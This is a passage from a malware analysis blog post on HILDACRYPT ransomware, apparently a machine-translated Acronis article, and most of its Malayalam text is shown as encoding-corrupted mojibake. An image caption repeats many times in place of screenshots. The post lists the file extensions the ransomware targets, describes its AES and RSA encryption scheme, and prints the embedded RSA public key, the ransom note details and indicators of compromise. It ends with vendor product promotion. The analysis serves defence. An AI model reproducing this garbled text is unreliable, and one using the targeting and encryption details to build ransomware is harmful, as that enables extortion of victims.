ยซ.vb:.asmx:.config:.3dm:.3ds:.3fr:.3g2:.3gp:.3pr:.7z:.ab4:.accdb:.accde:.accdr:.accdt:.ach:.acr:.act:.adb:.ads:.agdl:.ai:.ait:.al:.apj:.arw:.asf:.asm:.asp:.aspx:.asx:.avi:.awg:.back:.backup:.backupdb:.bak:.lua:.m:.m4v:.max:.mdb:.mdc:.mdf:.mef:.mfw:.mmw:.moneywell:.mos:.mov:.mp3:.mp4:.mpg:.mpeg:.mrw:.msg:.myd:.nd:.ndd:.nef:.nk2:.nop:.nrw:.ns2:.ns3:.ns4:.nsd:.nsf:.nsg:.nsh:.nwb:.nx2:.nxl:.nyf:.tif:.tlg:.txt:.vob:.wallet:.war:.wav:.wb2:.wmv:.wpd:.wps:.x11:.x3f:.xis:.xla:.xlam:.xlk:.xlm:.xlr:.xls:.xlsb:.xlsm:.xlsx:.xlt:.xltm:.xltx:.xlw:.xml:.ycbcra:.yuv:.zip:.sqlite:.sqlite3:.sqlitedb:.sr2:.srf:.srt:.srw:.st4:.st5:.st6:.st7:.st8:.std:.sti:.stw:.stx:.svg:.swf:.sxc:.sxd:.sxg:.sxi:.sxm:.sxw:.tex:.tga:.thm:.tib:.py:.qba:.qbb:.qbm:.qbr:.qbw:.qbx:.qby:.r3d:.raf:.rar:.rat:.raw:.rdb:.rm:.rtf:.rw2:.rwl:.rwz:.s3db:.sas7bdat:.say:.sd0:.sda:.sdf:.sldm:.sldx:.sql:.pdd:.pdf:.pef:.pem:.pfx:.php:.php5:.phtml:.pl:.plc:.png:.pot:.potm:.potx:.ppam:.pps:.ppsm:.ppsx:.ppt:.pptm:.pptx:.prf:.ps:.psafe3:.psd:.pspimage:.pst:.ptx:.oab:.obj:.odb:.odc:.odf:.odg:.odm:.odp:.ods:.odt:.oil:.orf:.ost:.otg:.oth:.otp:.ots:.ott:.p12:.p7b:.p7c:.pab:.pages:.pas:.pat:.pbl:.pcd:.pct:.pdb:.gray:.grey:.gry:.h:.hbk:.hpp:.htm:.html:.ibank:.ibd:.ibz:.idx:.iif:.iiq:.incpas:.indd:.jar:.java:.jpe:.jpeg:.jpg:.jsp:.kbx:.kc2:.kdbx:.kdc:.key:.kpdx:.doc:.docm:.docx:.dot:.dotm:.dotx:.drf:.drw:.dtd:.dwg:.dxb:.dxf:.dxg:.eml:.eps:.erbsql:.erf:.exf:.fdb:.ffd:.fff:.fh:.fhd:.fla:.flac:.flv:.fmb:.fpx:.fxg:.cpp:.cr2:.craw:.crt:.crw:.cs:.csh:.csl:.csv:.dac:.bank:.bay:.bdb:.bgt:.bik:.bkf:.bkp:.blend:.bpw:.c:.cdf:.cdr:.cdr3:.cdr4:.cdr5:.cdr6:.cdrw:.cdx:.ce1:.ce2:.cer:.cfp:.cgm:.cib:.class:.cls:.cmt:.cpi:.ddoc:.ddrw:.dds:.der:.des:.design:.dgc:.djvu:.dng:.db:.db-journal:.db3:.dcr:.dcs:.ddd:.dbf:.dbx:.dc2:.pbl:.csproj:.sln:.vbproj:.mdb:.mdยป

เด‰เดชเดฏเต‹เด•เตเดคเตƒ เดซเดฏเดฒเตเด•เตพ เดŽเตปเด•เตเดฐเดฟเดชเตเดฑเตเดฑเต เดšเต†เดฏเตเดฏเดพเตป ransomware AES-256-CBC เด…เตฝเด—เต‹เดฐเดฟเดคเด‚ เด‰เดชเดฏเต‹เด—เดฟเด•เตเด•เตเดจเตเดจเต. เด•เต€ เดตเดฒเตเดชเตเดชเด‚ 256 เดฌเดฟเดฑเตเดฑเตเด•เดณเตเด‚ เด‡เดจเต€เดทเตเดฏเดฒเตˆเดธเต‡เดทเตป เดตเต†เด•เตเดฑเตเดฑเตผ (IV) เดตเดฒเตเดชเตเดชเด‚ 16 เดฌเตˆเดฑเตเดฑเตเด•เดณเตเดฎเดพเดฃเต.

HILDACRYPT: เดชเตเดคเดฟเดฏ ransomware เดฌเดพเด•เตเด•เดชเตเดชเต เดธเดฟเดธเตเดฑเตเดฑเด™เตเด™เดณเต†เดฏเตเด‚ เด†เดจเตเดฑเดฟเดตเตˆเดฑเดธเต เดธเตŠเดฒเตเดฏเต‚เดทเดจเตเด•เดณเต†เดฏเตเด‚ เดฌเดพเดงเดฟเด•เตเด•เตเดจเตเดจเต

เด‡เดจเดฟเดชเตเดชเดฑเดฏเตเดจเตเดจ เดธเตเด•เตเดฐเต€เตปเดทเต‹เดŸเตเดŸเดฟเตฝ, GetBytes() เด‰เดชเดฏเต‹เด—เดฟเดšเตเดšเต byte_2, byte_1 เดŽเดจเตเดจเดฟเดตเดฏเตเดŸเต† เดฎเต‚เดฒเตเดฏเด™เตเด™เตพ เด•เตเดฐเดฎเดฐเดนเดฟเดคเดฎเดพเดฏเดฟ เดฒเดญเดฟเดšเตเดšเต.

HILDACRYPT: เดชเตเดคเดฟเดฏ ransomware เดฌเดพเด•เตเด•เดชเตเดชเต เดธเดฟเดธเตเดฑเตเดฑเด™เตเด™เดณเต†เดฏเตเด‚ เด†เดจเตเดฑเดฟเดตเตˆเดฑเดธเต เดธเตŠเดฒเตเดฏเต‚เดทเดจเตเด•เดณเต†เดฏเตเด‚ เดฌเดพเดงเดฟเด•เตเด•เตเดจเตเดจเต

เด•เต†

HILDACRYPT: เดชเตเดคเดฟเดฏ ransomware เดฌเดพเด•เตเด•เดชเตเดชเต เดธเดฟเดธเตเดฑเตเดฑเด™เตเด™เดณเต†เดฏเตเด‚ เด†เดจเตเดฑเดฟเดตเตˆเดฑเดธเต เดธเตŠเดฒเตเดฏเต‚เดทเดจเตเด•เดณเต†เดฏเตเด‚ เดฌเดพเดงเดฟเด•เตเด•เตเดจเตเดจเต

ะ’ะ˜

HILDACRYPT: เดชเตเดคเดฟเดฏ ransomware เดฌเดพเด•เตเด•เดชเตเดชเต เดธเดฟเดธเตเดฑเตเดฑเด™เตเด™เดณเต†เดฏเตเด‚ เด†เดจเตเดฑเดฟเดตเตˆเดฑเดธเต เดธเตŠเดฒเตเดฏเต‚เดทเดจเตเด•เดณเต†เดฏเตเด‚ เดฌเดพเดงเดฟเด•เตเด•เตเดจเตเดจเต

เดŽเตปเด•เตเดฐเดฟเดชเตเดฑเตเดฑเต เดšเต†เดฏเตเดค เดซเดฏเดฒเดฟเดจเต HCY เดŽเดจเตเดจ เดŽเด•เตเดธเตเดฑเตเดฑเตปเดทเตป เด‰เดฃเตเดŸเต!.. เด‡เดคเต เดŽเตปเด•เตเดฐเดฟเดชเตเดฑเตเดฑเต เดšเต†เดฏเตเดค เดซเดฏเดฒเดฟเดจเตเดฑเต† เด’เดฐเต เด‰เดฆเดพเดนเดฐเดฃเดฎเดพเดฃเต. เดฎเตเด•เดณเดฟเตฝ เดธเต‚เดšเดฟเดชเตเดชเดฟเดšเตเดš เด•เต€เดฏเตเด‚ IV-เดฏเตเด‚ เดˆ เดซเดฏเดฒเดฟเดจเดพเดฏเดฟ เดธเตƒเดทเตเดŸเดฟเดšเตเดšเดคเดพเดฃเต.

HILDACRYPT: เดชเตเดคเดฟเดฏ ransomware เดฌเดพเด•เตเด•เดชเตเดชเต เดธเดฟเดธเตเดฑเตเดฑเด™เตเด™เดณเต†เดฏเตเด‚ เด†เดจเตเดฑเดฟเดตเตˆเดฑเดธเต เดธเตŠเดฒเตเดฏเต‚เดทเดจเตเด•เดณเต†เดฏเตเด‚ เดฌเดพเดงเดฟเด•เตเด•เตเดจเตเดจเต

เด•เต€ เดŽเตปเด•เตเดฐเดฟเดชเตเดทเตป

เด•เตเดฐเดฟเดชเตโ€Œเดฑเตเดฑเต‹เดฒเต‹เด•เตเด•เตผ เดœเดจเดฑเต‡เดฑเตเดฑเตเดšเต†เดฏเตโ€Œเดค AES เด•เต€ เด’เดฐเต เดŽเตปเด•เตเดฐเดฟเดชเตเดฑเตเดฑเต เดšเต†เดฏเตโ€Œเดค เดซเดฏเดฒเดฟเตฝ เดธเด‚เดญเดฐเดฟเด•เตเด•เตเดจเตเดจเต. เดŽเตปเด•เตเดฐเดฟเดชเตเดฑเตเดฑเต เดšเต†เดฏเตเดค เดซเดฏเดฒเดฟเดจเตเดฑเต† เด†เดฆเตเดฏ เดญเดพเด—เดคเตเดคเดฟเดจเต HILDACRYPT, KEY, IV, XML เดซเต‹เตผเดฎเดพเดฑเตเดฑเดฟเดฒเตเดณเตเดณ FileLen เดชเต‹เดฒเตเดณเตเดณ เดกเดพเดฑเตเดฑ เด…เดŸเด™เตเด™เตเดจเตเดจ เด’เดฐเต เดคเดฒเด•เตเด•เต†เดŸเตเดŸเตเดฃเตเดŸเต, เด‡เดคเตเดชเต‹เดฒเต† เด•เดพเดฃเดชเตเดชเต†เดŸเตเดจเตเดจเต:

HILDACRYPT: เดชเตเดคเดฟเดฏ ransomware เดฌเดพเด•เตเด•เดชเตเดชเต เดธเดฟเดธเตเดฑเตเดฑเด™เตเด™เดณเต†เดฏเตเด‚ เด†เดจเตเดฑเดฟเดตเตˆเดฑเดธเต เดธเตŠเดฒเตเดฏเต‚เดทเดจเตเด•เดณเต†เดฏเตเด‚ เดฌเดพเดงเดฟเด•เตเด•เตเดจเตเดจเต

AES, IV เด•เต€ เดŽเตปเด•เตเดฐเดฟเดชเตเดทเตป RSA-2048 เด‰เดชเดฏเต‹เด—เดฟเดšเตเดšเดพเดฃเต เดšเต†เดฏเตเดฏเตเดจเตเดจเดคเต, เด•เต‚เดŸเดพเดคเต† Base64 เด‰เดชเดฏเต‹เด—เดฟเดšเตเดšเดพเดฃเต เดŽเตปเด•เต‹เดกเดฟเด‚เด—เต เดšเต†เดฏเตเดฏเตเดจเตเดจเดคเต. XML เดซเต‹เตผเดฎเดพเดฑเตเดฑเดฟเตฝ เดŽเตปเด•เตเดฐเดฟเดชเตเดฑเตเดฑเต เดšเต†เดฏเตเดค เดธเตเดŸเตเดฐเดฟเด‚เด—เตเด•เดณเดฟเดฒเตŠเดจเตเดจเดฟเตฝ เด•เตเดฐเดฟเดชเตโ€Œเดฑเตเดฑเต‹เดฒเต‹เด•เตเด•เดฑเดฟเดจเตเดฑเต† เดฌเต‹เดกเดฟเดฏเดฟเตฝ RSA เดชเดฌเตเดฒเดฟเด•เต เด•เต€ เดธเด‚เดญเดฐเดฟเดšเตเดšเดฟเดฐเดฟเด•เตเด•เตเดจเตเดจเต.

28guEbzkzciKg3N/ExUq8jGcshuMSCmoFsh/3LoMyWzPrnfHGhrgotuY/cs+eSGABQ+rs1B+MMWOWvqWdVpBxUgzgsgOgcJt7P+r4bWhfccYeKDi7PGRtZuTv+XpmG+m+u/JgerBM1Fi49+0vUMuEw5a1sZ408CvFapojDkMT0P5cJGYLSiVFud8reV7ZtwcCaGf88rt8DAUt2iSZQix0aw8PpnCH5/74WE8dAHKLF3sYmR7yFWAdCJRovzdx8/qfjMtZ41sIIIEyajVKfA18OT72/UBME2gsAM/BGii2hgLXP5ZGKPgQEf7Zpic1fReZcpJonhNZzXztGCSLfa/jQ==AQAB

AES เดซเดฏเตฝ เด•เต€ เดŽเตปเด•เตเดฐเดฟเดชเตเดฑเตเดฑเต เดšเต†เดฏเตเดฏเดพเตป เด’เดฐเต RSA เดชเดฌเตเดฒเดฟเด•เต เด•เต€ เด‰เดชเดฏเต‹เด—เดฟเด•เตเด•เตเดจเตเดจเต. RSA เดชเดฌเตเดฒเดฟเด•เต เด•เต€ Base64 เดŽเตปเด•เต‹เดกเต เดšเต†เดฏเตโ€Œเดคเดคเดพเดฃเต, เด…เดคเดฟเตฝ เด’เดฐเต เดฎเต‹เดกเตเดฒเดธเตเด‚ 65537 เดŽเดจเตเดจ เดชเดฌเตเดฒเดฟเด•เต เดŽเด•เตโ€Œเดธเตโ€Œเดชเต‹เดฃเดจเตเดฑเตเด‚ เด…เดŸเด™เตเด™เดฟเดฏเดฟเดฐเดฟเด•เตเด•เตเดจเตเดจเต. เดกเต€เด•เตเดฐเดฟเดชเตเดฑเตเดฑเดฟเดจเต เด†เด•เตเดฐเดฎเดฃเด•เดพเดฐเดฟเดฏเตเดŸเต† เด•เตˆเดตเดถเดฎเตเดณเตเดณ RSA เดชเตเดฐเตˆเดตเดฑเตเดฑเต เด•เต€ เด†เดตเดถเตเดฏเดฎเดพเดฃเต.

RSA เดŽเตปเด•เตเดฐเดฟเดชเตเดทเดจเตเดถเต‡เดทเด‚, เดŽเตปเด•เตเดฐเดฟเดชเตเดฑเตเดฑเต เดšเต†เดฏเตเดค เดซเดฏเดฒเดฟเตฝ เดธเด‚เดญเดฐเดฟเดšเตเดšเดฟเดฐเดฟเด•เตเด•เตเดจเตเดจ Base64 เด‰เดชเดฏเต‹เด—เดฟเดšเตเดšเต AES เด•เต€ เดŽเตปเด•เต‹เดกเต เดšเต†เดฏเตเดฏเดชเตเดชเต†เดŸเตเดจเตเดจเต.

เดฎเต‹เดšเดจเดฆเตเดฐเดตเตเดฏ เดธเดจเตเดฆเต‡เดถเด‚

เดŽเตปเด•เตเดฐเดฟเดชเตเดทเตป เดชเต‚เตผเดคเตเดคเดฟเดฏเดพเดฏเดฟเด•เตเด•เดดเดฟเดžเตเดžเดพเตฝ, HILDACRYPT เดซเดฏเดฒเตเด•เตพ เดŽเตปเด•เตเดฐเดฟเดชเตเดฑเตเดฑเต เดšเต†เดฏเตเดค เดซเต‹เตพเดกเดฑเดฟเดฒเต‡เด•เตเด•เต html เดซเดฏเตฝ เดŽเดดเตเดคเตเดจเตเดจเต. ransomware เด…เดฑเดฟเดฏเดฟเดชเตเดชเดฟเตฝ เด‡เดฐเดฏเตเด•เตเด•เต เด†เด•เตเดฐเดฎเดฃเด•เดพเดฐเดฟเดฏเตเดฎเดพเดฏเดฟ เดฌเดจเตเดงเดชเตเดชเต†เดŸเดพเตป เด•เดดเดฟเดฏเตเดจเตเดจ เดฐเดฃเตเดŸเต เด‡เดฎเต†เดฏเดฟเตฝ เดตเดฟเดฒเดพเดธเด™เตเด™เตพ เด…เดŸเด™เตเด™เดฟเดฏเดฟเดฐเดฟเด•เตเด•เตเดจเตเดจเต.

HILDACRYPT: เดชเตเดคเดฟเดฏ ransomware เดฌเดพเด•เตเด•เดชเตเดชเต เดธเดฟเดธเตเดฑเตเดฑเด™เตเด™เดณเต†เดฏเตเด‚ เด†เดจเตเดฑเดฟเดตเตˆเดฑเดธเต เดธเตŠเดฒเตเดฏเต‚เดทเดจเตเด•เดณเต†เดฏเตเด‚ เดฌเดพเดงเดฟเด•เตเด•เตเดจเตเดจเต

เดคเดŸเตเดŸเดฟเด•เตเด•เตŠเดฃเตเดŸเตเดชเต‹เด•เตฝ เดจเต‹เดŸเตเดŸเต€เดธเดฟเตฝ โ€œเดฒเต‹เดฒเดฟ เดธเตเดฐเด•เตเดทเดฟเดคเดฎเดฒเตเดฒ;)โ€ เดŽเดจเตเดจ เดตเดฐเดฟเดฏเตเด‚ เด…เดŸเด™เตเด™เดฟเดฏเดฟเดฐเดฟเด•เตเด•เตเดจเตเดจเต - เดœเดชเตเดชเดพเดจเดฟเตฝ เดจเดฟเดฐเต‹เดงเดฟเดšเตเดšเดฟเดฐเดฟเด•เตเด•เตเดจเตเดจ เด•เตŠเดšเตเดšเต เดชเต†เตบเด•เตเดŸเตเดŸเดฟเด•เดณเตเดŸเต† เดฐเต‚เดชเดคเตเดคเดฟเดฒเตเดณเตเดณ เด†เดจเดฟเดฎเต‡เดทเตป, เดฎเดพเด‚เด— เด•เดฅเดพเดชเดพเดคเตเดฐเด™เตเด™เดณเต†เด•เตเด•เตเดฑเดฟเดšเตเดšเตเดณเตเดณ เด’เดฐเต เดชเดฐเดพเดฎเตผเดถเด‚.

เดคเต€เดฐเตเดฎเดพเดจเด‚

ransomware-เดจเตเดฑเต† เดชเตเดคเดฟเดฏ เด•เตเดŸเตเด‚เดฌเดฎเดพเดฏ HILDACRYPT เด’เดฐเต เดชเตเดคเดฟเดฏ เดชเดคเดฟเดชเตเดชเต เดชเตเดฑเดคเตเดคเดฟเดฑเด•เตเด•เดฟ. ransomware เดŽเตปเด•เตเดฐเดฟเดชเตเดฑเตเดฑเต เดšเต†เดฏเตเดค เดซเดฏเดฒเตเด•เตพ เดกเต€เด•เตเดฐเดฟเดชเตเดฑเตเดฑเต เดšเต†เดฏเตเดฏเตเดจเตเดจเดคเดฟเตฝ เดจเดฟเดจเตเดจเต เดŽเตปเด•เตเดฐเดฟเดชเตเดทเตป เดฎเต‹เดกเตฝ เด‡เดฐเดฏเต† เดคเดŸเดฏเตเดจเตเดจเต. เดฌเดพเด•เตเด•เดชเตเดชเต เดธเดฟเดธเตเดฑเตเดฑเด™เตเด™เดณเตเดฎเดพเดฏเตเด‚ เด†เตปเดฑเดฟเดตเตˆเดฑเดธเต เดธเตŠเดฒเตเดฏเต‚เดทเดจเตเด•เดณเตเดฎเดพเดฏเตเด‚ เดฌเดจเตเดงเดชเตเดชเต†เดŸเตเดŸ เดธเด‚เดฐเด•เตเดทเดฃ เดธเต‡เดตเดจเด™เตเด™เตพ เดชเตเดฐเดตเตผเดคเตเดคเดจเดฐเดนเดฟเดคเดฎเดพเด•เตเด•เดพเตป เด•เตเดฐเดฟเดชเตโ€Œเดฑเตเดฑเต‹เดฒเต‹เด•เตเด•เตผ เดธเดœเต€เดต เดธเด‚เดฐเด•เตเดทเดฃ เดฐเต€เดคเดฟเด•เตพ เด‰เดชเดฏเต‹เด—เดฟเด•เตเด•เตเดจเตเดจเต. HILDACRYPT-เดจเตเดฑเต† เดฐเดšเดฏเดฟเดคเดพเดตเต Netflix-เตฝ เด•เดพเดฃเดฟเดšเตเดšเดฟเดฐเดฟเด•เตเด•เตเดจเตเดจ เดนเดฟเตฝเดก เดŽเดจเตเดจ เด†เดจเดฟเดฎเต‡เดฑเตเดฑเดกเต เดธเต€เดฐเต€เดธเดฟเดจเตเดฑเต† เด†เดฐเดพเดงเด•เดจเดพเดฃเต, เด…เดคเดฟเดจเตเดฑเต† เดŸเตเดฐเต†เดฏเดฟเดฒเดฑเดฟเดฒเต‡เด•เตเด•เตเดณเตเดณ เดฒเดฟเด™เตเด•เต เดชเตเดฐเต‹เด—เตเดฐเดพเดฎเดฟเดจเตเดฑเต† เดฎเตเตป เดชเดคเดฟเดชเตเดชเดฟเดจเตเดฑเต† เดตเดพเด™เตเด™เตฝ เด•เดคเตเดคเดฟเตฝ เด…เดŸเด™เตเด™เดฟเดฏเดฟเดฐเดฟเด•เตเด•เตเดจเตเดจเต.

เดชเดคเดฟเดตเต เดชเต‡เดพเดฒเต†, เด…เด•เตเดฐเต‹เดฃเดฟเดธเต เดฌเดพเด•เตเด•เดชเตเดชเต ะธ เด…เด•เตเดฐเต‹เดฃเดฟเดธเต เดŸเตเดฐเต‚ เด‡เดฎเต‡เดœเต HILDACRYPT ransomware-เตฝ เดจเดฟเดจเตเดจเต เดจเดฟเด™เตเด™เดณเตเดŸเต† เด•เดฎเตเดชเตเดฏเต‚เดŸเตเดŸเดฑเดฟเดจเต† เดธเด‚เดฐเด•เตเดทเดฟเด•เตเด•เดพเตป เด•เดดเดฟเดฏเตเด‚, เด•เต‚เดŸเดพเดคเต† เดฆเดพเดคเดพเด•เตเด•เตพเด•เตเด•เต เด…เดตเดฐเตเดŸเต† เด‰เดชเดญเต‹เด•เตเดคเดพเด•เตเด•เดณเต† เดธเด‚เดฐเด•เตเดทเดฟเด•เตเด•เดพเดจเตเดณเตเดณ เด•เดดเดฟเดตเตเดฃเตเดŸเต เด…เด•เตเดฐเต‹เดฃเดฟเดธเต เดฌเดพเด•เตเด•เดชเตเดชเต เด•เตเดฒเต—เดกเต. เดˆ เดชเดฐเดฟเดนเดพเดฐเด™เตเด™เตพ เด‰เตพเดชเตเดชเต†เดŸเตเดจเตเดจ เดตเดธเตเดคเตเดคเดฏเดพเตฝ เดธเด‚เดฐเด•เตเดทเดฃเด‚ เด‰เดฑเดชเตเดชเดพเด•เตเด•เดชเตเดชเต†เดŸเตเดจเตเดจเต เดธเตˆเดฌเตผ เดธเตเดฐเด•เตเดท เดฌเดพเด•เตเด•เดชเตเดชเต เดฎเดพเดคเตเดฐเดฎเดฒเตเดฒ, เดžเด™เตเด™เดณเตเดŸเต† เดธเด‚เดฏเต‹เดœเดฟเดค เดธเตเดฐเด•เตเดทเดพ เดธเด‚เดตเดฟเดงเดพเดจเดตเตเด‚ เด‰เตพเดชเตเดชเต†เดŸเตเดจเตเดจเต เด…เด•เตเดฐเต‹เดฃเดฟเดธเต เดธเดœเต€เดต เดธเด‚เดฐเด•เตเดทเดฃเด‚ - เด’เดฐเต เดฎเต†เดทเต€เตป เดฒเต‡เดฃเดฟเด‚เด—เต เดฎเต‹เดกเตฝ, เดฌเดฟเดนเต‡เดตเดฟเดฏเดฑเตฝ เดนเตเดฏเต‚เดฑเดฟเดธเตเดฑเตเดฑเดฟเด•เตเดธเต เด…เดŸเดฟเดธเตเดฅเดพเดจเดฎเดพเด•เตเด•เดฟเดฏเตเดณเตเดณ, เดธเต€เดฑเต‹-เดกเต‡ ransomware เดŽเดจเตเดจ เดญเต€เดทเดฃเดฟเดฏเต† เดฎเดฑเตเดฑเต‡เดคเต เดชเต‹เดฒเต† เดจเต‡เดฐเดฟเดŸเดพเตป เด•เดดเดฟเดตเตเดณเตเดณ เด’เดฐเต เดธเดพเด™เตเด•เต‡เดคเดฟเด•เดตเดฟเดฆเตเดฏ.

เดตเดฟเดŸเตเดŸเตเดตเต€เดดเตเดšเดฏเตเดŸเต† เดธเต‚เดšเด•เด™เตเด™เตพ

เดซเดฏเตฝ เดตเดฟเดชเตเดฒเต€เด•เดฐเดฃเด‚ HCY!
HILDACRYPTReadMe.html
xamp.exe เดŽเดจเตเดจเดคเดฟเตฝ "p" เดŽเดจเตเดจ เด’เดฑเตเดฑ เด…เด•เตเดทเดฐเดตเตเด‚ เดกเดฟเดœเดฟเดฑเตเดฑเตฝ เด’เดชเตเดชเต เด‡เดฒเตเดฒ
SHA-256: 7b0dcc7645642c141deb03377b451d3f873724c254797e3578ef8445a38ece8a

เด…เดตเดฒเด‚เดฌเด‚: www.habr.com

เด’เดฐเต เด…เดญเดฟเดชเตเดฐเดพเดฏเด‚ เดšเต‡เตผเด•เตเด•เตเด•